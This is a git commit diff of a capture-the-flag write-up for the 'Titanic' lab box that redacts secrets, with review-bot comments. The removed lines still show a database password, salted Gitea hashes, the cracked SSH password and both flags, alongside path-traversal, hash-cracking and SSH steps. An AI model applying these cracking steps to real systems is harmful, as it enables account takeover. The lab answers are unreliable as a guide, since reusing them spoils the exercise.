Fix typos

Quentin Rouland 2025-03-24 18:18:17 +01:00
parent 12e2ca11c0
commit 41d64619f3

@ -126,7 +126,7 @@ On `dev.titanic.htb`, we find a Gitea instance running version 1.22.1. Two publi
- `http://dev.titanic.htb/developer/flask-app` (contains code for the Flask app) - `http://dev.titanic.htb/developer/flask-app` (contains code for the Flask app)
- `http://dev.titanic.htb/developer/docker-config` (contains Docker compose for the app) - `http://dev.titanic.htb/developer/docker-config` (contains Docker compose for the app)
In the Docker configuration, we found a MySQL configuration with the root password ```MySQLP@$$w0rd!```. However, it didn't seem like the MySQL server was running, so we kept this information but it appeared to be unusable at the moment. In the Docker configuration, we found a MySQL configuration with the root password ```<SNIP>```. However, it didn't seem like the MySQL server was running, so we kept this information but it appeared to be unusable at the moment.
Additionally, we discovered that Gitea data is located at ```/home/developer/gitea/data/gitea``` in the Docker Compose files. We can use path traversal to access this data. Additionally, we discovered that Gitea data is located at ```/home/developer/gitea/data/gitea``` in the Docker Compose files. We can use path traversal to access this data.
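Review bot: The commit subject says "Fix typos", but the changed line in this hunk replaces the MySQL root password with `<SNIP>`, which is a redaction and not a typo fix. Suggest a subject that says what the commit does, for example "Redact credentials and flags from writeup". The removed value is also still readable on the old side of this diff and in parent 12e2ca11c0, so if the intent is to take it out of the repository, the history has to be rewritten as well.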
@ -150,19 +150,19 @@ $ cd giteatohashcat/
$ python giteaToHashcat.py ../../gitea.db $ python giteaToHashcat.py ../../gitea.db
[+] Extracting password hashes... [+] Extracting password hashes...
[+] Extraction complete. Output: [+] Extraction complete. Output:
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY= administrator:sha256:50000:<SNIP>
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y= developer:sha256:50000:<SNIP>
... ...
``` ```
We focused on the `developer` user, as we identified that there is an SSH user with the same username and a shell. We hoped it used the same password, so we attempted to crack the password `hash` using hashcat. We focused on the `developer` user, as we identified that there is an SSH user with the same username and a shell. We hoped it used the same password, so we attempted to crack the password `hash` using hashcat.
```bash ```bash
hashcat -m 10900 sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y= /usr/share/wordlists/rockyou.txt.gz hashcat -m 10900 sha256:50000:<SNIP> /usr/share/wordlists/rockyou.txt.gz
.... ....
``` ```
After successfully cracking the hash, we get the password `25282528`. After successfully cracking the hash, we get the password `<SNIP>`.
#### Getting SSH Access #### Getting SSH Access
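Review bot: In the `hashcat` line of the bash block, the unquoted placeholder changes how the command parses. A shell reads `sha256:50000:<SNIP> /usr/share/wordlists/rockyou.txt.gz` as an input redirect from a file named `SNIP` followed by an output redirect onto the wordlist path, so a reader who copies the line does not get a hashcat usage error but a redirection. Suggest single-quoting the argument, `'sha256:50000:<SNIP>'`. The redaction also drops the salt field together with the digest on the `administrator` and `developer` lines; if that is intended, one sentence in the text saying the hash is truncated would keep the mode 10900 format understandable.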
@ -173,7 +173,7 @@ $ ssh developer@titanic.htb
$ whoami $ whoami
developer developer
$ cat user.txt $ cat user.txt
979fbe270d355153aa5ee87ce670b273 <SNIP>
``` ```
Now we have foothold on the machine and our first user flag. Now we have foothold on the machine and our first user flag.
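Review bot: The unchanged context line after the code block, "Now we have foothold on the machine", is missing an article. Since this commit is titled "Fix typos", it could be corrected here to "Now we have a foothold on the machine and our first user flag."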
@ -225,7 +225,7 @@ $ whoami
root root
$ cd $ cd
$ cat root.txt $ cat root.txt
867da4d778e3cb6d310e60f2ae7366c1 <SNIP>
``` ```
We have gained root access and obtained the root flag! We have gained root access and obtained the root flag!